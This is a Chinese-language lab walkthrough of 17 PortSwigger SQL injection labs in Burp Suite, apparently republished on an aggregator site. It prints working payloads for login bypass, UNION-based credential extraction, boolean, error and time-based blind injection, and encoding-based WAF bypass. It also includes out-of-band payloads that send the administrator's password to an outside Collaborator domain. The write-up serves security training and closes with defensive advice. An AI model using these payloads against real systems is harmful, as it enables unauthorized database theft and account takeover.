BurpSuit实战:SQL注入漏洞的17种攻击手法全解析

news2026/3/14 11:38:52
1. 从零开始认识Burp Suite与SQL注入如果你刚开始接触Web安全可能会觉得Burp Suite和SQL注入这两个词听起来有点吓人。别担心我刚开始学的时候也是一头雾水感觉像在看天书。但实际用起来你会发现Burp Suite其实就是个“超级浏览器”它能帮你看到浏览器和网站服务器之间所有的“悄悄话”。而SQL注入呢简单来说就是黑客在网站输入框里“说”一些特殊的“暗号”骗网站背后的数据库执行不该执行的命令从而偷看、修改甚至删除数据。我打个比方这就像你去图书馆查资料。正常情况下你告诉管理员“我想找一本关于编程的书。”管理员就去书库里帮你找。但SQL注入的攻击者会说“我想找一本关于编程的书另外请把整个图书馆所有读者的借阅记录也拿给我看看。”如果图书馆的管理系统也就是网站程序设计得不好它可能真的会傻乎乎地把后面那句也当成合法的查询指令去执行。Burp Suite就是那个帮你“监听”和“模拟”这种对话过程的工具让你能亲自测试一个网站的管理系统到底傻不傻。为什么我们要用Burp Suite官方实验室来学SQL注入呢因为它提供了一个绝对安全、合法的“沙盒”环境。里面的靶场网站就是专门设计来让你“黑”的你不用担心法律问题也不用怕把别人的真网站搞垮。你可以放开手脚尝试各种攻击手法亲眼看到每一种攻击是怎么生效的网站又是怎么“中招”的。这种实战经验比看一百篇理论文章都管用。接下来我会带你手把手地通关这17个Lab。咱们不搞那些虚头巴脑的理论堆砌就是实打实地操作、观察、理解。我会把我自己踩过的坑、试出来的技巧都告诉你保证你看完就能自己上手玩转Burp Suite彻底搞懂SQL注入的来龙去脉。准备好了吗咱们先从最简单的开始。2. 热身运动基础注入与登录绕过2.1 第一关让隐藏的商品现身第一个Lab非常简单目的是让你找到感觉。靶场是一个商品分类页面比如你点“Lifestyle”标签浏览器地址栏会变成/filter?categoryLifestyle。这说明网站把咱们选中的分类名直接拼接到数据库查询语句里了。最初的思路是试探。我在Lifestyle后面加了个单引号页面报错了。这是个好迹象说明我们的输入被当成了SQL代码的一部分而不是普通数据。接着我尝试用注释符--把SQL语句后面的部分比如LIMIT子句给“注释掉”。在大多数数据库里--后面的内容会被忽略。于是我构造了这样的输入Lifestyle--。果然页面不再只显示限定数量的商品而是把这一类别的所有商品包括一些原本隐藏的全都显示出来了。但这还不够过瘾。我想看到所有分类的商品。怎么办用OR 11这个“万能钥匙”。我输入了Lifestyle OR 11--。这个语句的意思翻译过来就是“查询所有分类是‘Lifestyle’的商品或者……1等于1的记录。” 而11是个永远为真的条件。所以整个查询条件就变成了“真”数据库就会乖乖返回所有商品数据不管它属于哪个分类。页面刷地一下列出了所有商品第一关就这么轻松过了。这里的关键是理解OR逻辑运算符如何扩大了查询范围以及如何利用永真条件来绕过原始过滤。2.2 第二关不用密码也能进管理员后台第二个Lab模拟了一个登录场景。通常登录的SQL语句是这样的SELECT * FROM users WHERE username输入的用户名 AND password输入的密码。如果用户名和密码都对就让你登录。我们的目标是绕过密码验证用管理员账号administrator登录。方法就是利用SQL注入让密码检查的部分失效。我在用户名框里输入了administrator--密码框随便填了点东西比如123。提交后Burp Suite抓到的请求里这个输入被拼接到SQL语句中就变成了SELECT * FROM users WHERE usernameadministrator-- AND password123。看到没--把后面检查密码的AND password123整个都注释掉了于是语句的实际执行部分只剩下查找用户名为administrator这一条。只要这个用户存在数据库就会返回他的信息网站就以为我们密码也对顺利让我们登录进了管理员后台。这一关虽然简单但揭示了登录框一个极其经典且危险的漏洞。很多早期的网站甚至一些安全意识薄弱的现代网站仍然存在这种问题。它告诉我们永远不要相信用户输入必须对输入进行严格的过滤和参数化处理。3. 联合查询的艺术从探测到窃取数据3.1 第三关摸清数据库的“底细”从第三关开始我们要使用UNION攻击了。UNION操作符可以把多条SELECT语句的结果合并成一个结果集。但有个前提每条SELECT语句查询的列数必须相同。所以我们的第一步永远是判断当前查询的列数。最常用的方法就是用ORDER BY子句。ORDER BY 1表示按第一列排序ORDER BY 2按第二列以此类推。如果指定的列数超过了实际列数数据库就会报错。在靶场里我依次尝试了 ORDER BY 1-- ORDER BY 2-- ORDER BY 3--页面都正常显示。当我尝试 ORDER BY 4--时页面报错了。这就清晰地告诉我们原始查询返回了3列数据。知道列数后就可以构造UNION SELECT了。为了匹配列数我输入了 UNION SELECT NULL, NULL, NULL--。这里用NULL是因为它在所有数据库类型中都是通用的占位符。页面正常执行说明联合查询成功。这一步是后续所有数据窃取的基础就像开锁前得先知道锁有几个齿孔一样。3.2 第四关寻找能显示文本的“窗口”知道了列数下一步是找出哪些列的数据类型是字符串或能显示文本因为只有这样的列我们注入查询的结果才能被我们看到。我使用了UNION SELECT a, NULL, NULL--这样的payload。如果第一个列能显示文本那么页面某个位置应该会出现一个字母“a”。我依次测试了三个位置 UNION SELECT a, NULL, NULL-- UNION SELECT NULL, a, NULL-- UNION SELECT NULL, NULL, a--。结果发现第二列显示了“a”。太好了第二个位置就是我们的“回显点”后续可以把我们想查询的数据放在这个位置显示出来。3.3 第五关直捣黄龙一锅端掉用户表有了前两关的铺垫这一关的目标很直接从其他表比如users表里把管理员账号密码偷出来。首先用ORDER BY确认当前查询有2列并且找到了字符串回显点假设在第二列。题目通常会给出提示比如存在users表里面有username和password字段。那么构造的Payload就很简单了 UNION SELECT username, password FROM users--。这里我把username放在第一列可能不显示password放在第二列我们的回显点。执行后页面上果然在商品列表的某个位置清晰地显示出了administrator和其对应的一串密码哈希值如r9p7687yedddtfy9ugd5。复制密码去登录框一试成功进入管理员账户。这种攻击之所以危险是因为它能让攻击者直接 dump 出整个用户表的数据导致大规模数据泄露。3.4 第六关当一列需要承载多个信息这一关稍微增加了点难度原始查询虽然返回2列但只有一个列能显示字符串数据。而我们想查询的username和password是两个字段。怎么办我们需要把两个字段的值“拼”在一起放到这一个能显示的列里。不同数据库的字符串连接方法不同。这个靶场用的是Oracle数据库它使用双竖线||作为连接符。所以我的Payload变成了 UNION SELECT NULL, username || : || password FROM users--。这个语句的意思是从users表里取出用户名和密码用冒号:连接起来然后作为一个整体字符串放到第二列去显示。执行后页面显示类似administrator:q1g44lzx12wu6k5zag77这样的结果。同样拿着密码就能成功登录。这个技巧在回显点有限的情况下非常实用是攻击者必须掌握的变通方法。4. 信息搜集识别数据库与挖掘结构4.1 第七关与第八关数据库版本侦察在真实的攻击中知道目标用什么数据库是MySQL、Oracle、PostgreSQL还是SQL Server以及什么版本至关重要。因为不同数据库的语法、系统表和函数都有差异后续的攻击Payload需要“对症下药”。第七关针对Oracle数据库。Oracle查询版本的标准语句是SELECT banner FROM v$version。结合联合查询我构造了 UNION SELECT NULL, banner FROM v$version--。执行后版本信息如“Oracle Database 11g Express Edition...”就清晰地显示在了页面上。第八关则针对MySQL和Microsoft SQL Server。MySQL的版本查询是SELECT version而MSSQL是SELECT version或SELECT version()。此外注释符也不同MySQL可以用#MSSQL和很多其他数据库用--。在测试时我需要根据页面反应来判断到底是哪种数据库然后使用对应的Payload。例如输入 UNION SELECT NULL, version#如果成功那很可能就是MySQL。4.2 第九关与第十关非Oracle与Oracle数据库的“扒库”手法知道了数据库类型我们就要像侦探一样摸清数据库里到底有哪些表表里有哪些列。这叫做“数据库结构探测”。对于像MySQL、PostgreSQL这类使用“信息模式”information_schema的数据库第九关过程比较标准查所有表名 UNION SELECT NULL, table_name FROM information_schema.tables--。从结果里找到像users_xxxxxx这样疑似存放用户凭证的表名。查指定表的所有列名 UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_nameusers_xxxxxx--。这里会返回username_xxxx,password_xxxx这样的列名。最后窃取数据 UNION SELECT NULL, username_xxxx || : || password_xxxx FROM users_xxxxxx--。而对于Oracle数据库第十关它的系统表名不一样查所有表名 UNION SELECT NULL, table_name FROM all_tables--。寻找类似USERS_XXXXX的表。查指定表的列名 UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name USERS_XXXXX--。窃取数据方法和前面一样用||连接符拼接字段并查询。这两关是SQL注入中技术性较强的部分需要你对不同数据库的系统表有基本了解。在实际操作中我经常会把常用的查询语句比如查表名、列名保存在Burp Suite的笔记或工具里随时取用能大大提高效率。5. 盲注的挑战当错误信息被隐藏前面的攻击网站都会把数据库的错误信息或查询结果直接“回显”在页面上这属于“有回显注入”。但稍微有点安全意识的网站都会关闭错误提示。这时候我们就需要用更高级的技巧——“盲注”。5.1 第十一关基于布尔逻辑的盲注这一关无论你输入什么页面看起来都“正常”没有数据回显也没有明显的报错。但是它有一个细微差别当注入的SQL语句逻辑为“真”时页面会多显示一个“Welcome back”的单词为“假”时这个词就消失。这就像玩一个“是或否”的猜谜游戏。我们可以通过精心构造的SQL问题根据页面是否有“Welcome back”来推断答案。例如问题“users表是否存在” Payload: AND (SELECT x FROM users LIMIT 1)x。如果返回“Welcome back”说明表存在。问题“administrator用户的密码长度大于10吗” Payload: AND (SELECT x FROM users WHERE usernameadministrator AND LENGTH(password)10)x。手工这样一位一位猜密码比如猜第一位是不是‘a’是不是‘b’…会累死人。所以必须借助工具自动化。Burp Suite的Intruder模块就是干这个的。我设置攻击类型为“Cluster bomb”第一个Payload集是密码的位数1到20第二个Payload集是小写字母a-z和数字0-9。然后让Intruder自动发送成千上万个请求通过观察哪个请求返回了“Welcome back”就能逐个位置地爆破出密码。这个过程可能耗时几分钟但完全自动化我们只需要喝杯咖啡等结果就行。5.2 第十二关基于错误信息的盲注这一关连“Welcome back”这种细微差别都没了页面完全一样。但是我们可以故意触发数据库的运行时错误如果页面返回了错误比如500内部服务器错误就说明我们注入的条件为“真”。这利用了数据库的CASE语句和除零错误。以Oracle为例Payload: || (SELECT CASE WHEN (11) THEN TO_CHAR(1/0) ELSE END FROM dual) || 。如果页面报错说明11这个真条件被执行了进而执行了TO_CHAR(1/0)触发错误。那么把11换成我们的问题比如SUBSTR(password, 1, 1)a就能通过页面是否报错来判断密码的第一位是不是‘a’。同样这个过程也需要用Burp Intruder进行自动化爆破。虽然比布尔盲注更隐蔽但原理是相通的构造一个二选一的问题真或假然后通过观察页面行为的差异正常 vs 报错来获取答案。6. 时间盲注与带外攻击终极隐匿手段6.1 第十三关与第十四关让数据库“睡一觉”来告诉我们答案如果网站连错误信息都屏蔽得干干净净页面响应无论对错都完全一致那怎么办还有最后一招时间盲注。原理是如果我们的注入条件为真就让数据库执行一个睡眠延迟函数等待几秒再响应如果为假就立刻响应。通过测量页面响应时间的长短我们就能判断条件真假。不同数据库的睡眠函数不同MySQL:SLEEP(10)PostgreSQL:pg_sleep(10)Microsoft SQL Server:WAITFOR DELAY 0:0:10Oracle:dbms_pipe.receive_message((a),10)第十三关很简单只是让你测试延迟函数是否生效。我输入了 || pg_sleep(10)--页面果然等了10秒才加载证明存在时间注入漏洞。第十四关则是实战用时间延迟来爆破管理员密码。Payload变得更复杂 || (SELECT CASE WHEN (SUBSTRING(password,1,1)a) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE usernameadministrator)--。这个语句的意思是如果密码第一位是‘a’就睡10秒否则不睡。用Burp Intruder爆破时必须将攻击线程Threads设置为1。因为如果多个请求并发响应时间会互相干扰无法准确判断哪个请求触发了延迟。你需要盯着“响应时间”这一列找到那个响应时间明显超过10秒的请求对应的Payload就是正确的字符。这个过程比前两种盲注更慢但却是最隐蔽、最难防御的注入方式之一。6.2 第十五关与第十六关带外数据外泄这是一种更高级、更直接的攻击方式不依赖于页面内容或响应时间而是让数据库主动发起一个网络连接如DNS查询到我们控制的服务器从而把数据带出来。这通常用于目标网络出口防火墙规则很严但DNS查询通常被允许的情况。Burp Suite Professional版自带一个叫Burp Collaborator的神器。它能生成一个临时的、唯一的域名如xxx.burpcollaborator.net。我们的攻击Payload就是让数据库去访问这个域名。第十五关我们只是测试带外通道是否畅通。Payload以Oracle为例类似 UNION SELECT EXTRACTVALUE(xmltype(?xml version1.0?!DOCTYPE root [ !ENTITY % remote SYSTEM http://我们的Collaborator域名/ %remote;]),/l) FROM dual--。如果攻击成功在Burp Collaborator客户端就会收到来自目标数据库服务器的DNS查询记录证明漏洞存在。第十六关我们要利用这个通道偷数据。我们把查询到的密码作为子域名的一部分发送出来... SYSTEM http://||(SELECT password FROM users WHERE usernameadministrator)||.我们的Collaborator域名/ ...。如果管理员密码是secret数据库就会尝试访问secret.我们的Collaborator域名。我们在Collaborator客户端看到的DNS查询记录里就会包含secret这个子域名从而间接获取到密码。这种方法极其隐蔽几乎无法通过传统的Web日志监控发现。7. 实战进阶绕过防御与工具技巧7.1 第十七关利用编码绕过WAF最后一关模拟了一个更真实的场景网站使用了Web应用防火墙WAF。当我们尝试普通的UNION SELECT注入时Payload会被WAF识别并拦截。这个靶场的注入点比较特殊在一个XML格式的数据包里storeId1/storeId。我首先测试了storeId11/storeId返回了和storeId2/storeId一样的结果证明这里存在数字型注入并且会进行数学运算。但当我注入1 UNION SELECT NULL, NULL时请求被WAF阻止了。这时就需要Hackvertor这个Burp插件来帮忙了。Hackvertor可以对Payload进行各种编码转换。我选中UNION SELECT NULL, NULL这部分通过Hackvertor将其转换为十六进制实体编码。转换后它看起来是一堆像U这样的代码。对于WAF来说这可能只是一串普通的XML实体但数据库在解析XML时会先将其解码还原成UNION SELECT语句从而成功执行注入绕过了WAF的规则匹配。最终我使用编码后的Payload成功执行了联合查询并将用户名和密码拼接后取出1 UNION SELECT username || : || password FROM users。这关告诉我们面对WAF灵活运用编码、大小写变换、注释混淆等技术往往能出其不意。7.2 Burp Suite实战心得与避坑指南走完这17个Lab你基本上就算SQL注入入门了。但我想分享几个我实战中总结的、教程里不常提的点第一心态要稳思路要活。不是每个注入点都像靶场这么标准。遇到不报错、不回显的情况先别慌按部就班地测试先试布尔盲注看看页面内容有无细微变化再试时间盲注用SLEEP(2)这种短延迟先试试水。多用AND 11和AND 12这种经典组合做真假测试。第二善用Burp的配套工具。Repeater是你手动测试Payload的沙盘可以反复修改发送观察响应。Intruder是自动化爆破的利器除了爆破密码还能用来模糊测试参数、枚举数据库名、表名等。Decoder和Comparer也经常用到一个用来编解码Payload一个用来精细比较两次响应的差异在盲注时特别有用。第三注意数据库的“小脾气”。MySQL的注释符#在URL里要编码成%23Oracle的字符串连接用||而MySQL用CONCAT()函数或空格查询版本信息的语句更是五花八门。我建议你建个自己的备忘清单或者直接利用Burp的Cheat Sheet功能。第四永远合法测试。这套实验室最大的价值就是给了我们一个合法的练兵场。在未经授权的情况下对任何真实网站进行SQL注入测试都是非法的可能面临法律风险。你的技能应该用在授权渗透测试、漏洞赏金项目或者像PortSwigger Academy这样的学习平台上。最后防御SQL注入其实并不复杂核心就一条使用参数化查询预编译语句让数据库把用户输入永远当作“数据”来处理而不是可能被执行的“代码”。作为开发者这是必须养成的习惯作为安全研究者理解攻击手法是为了更好地构建防御。希望这趟Burp Suite的SQL注入实战之旅能让你不仅成为一个合格的“攻击者”更能成为一个心中有数的“防御者”。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2410972.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…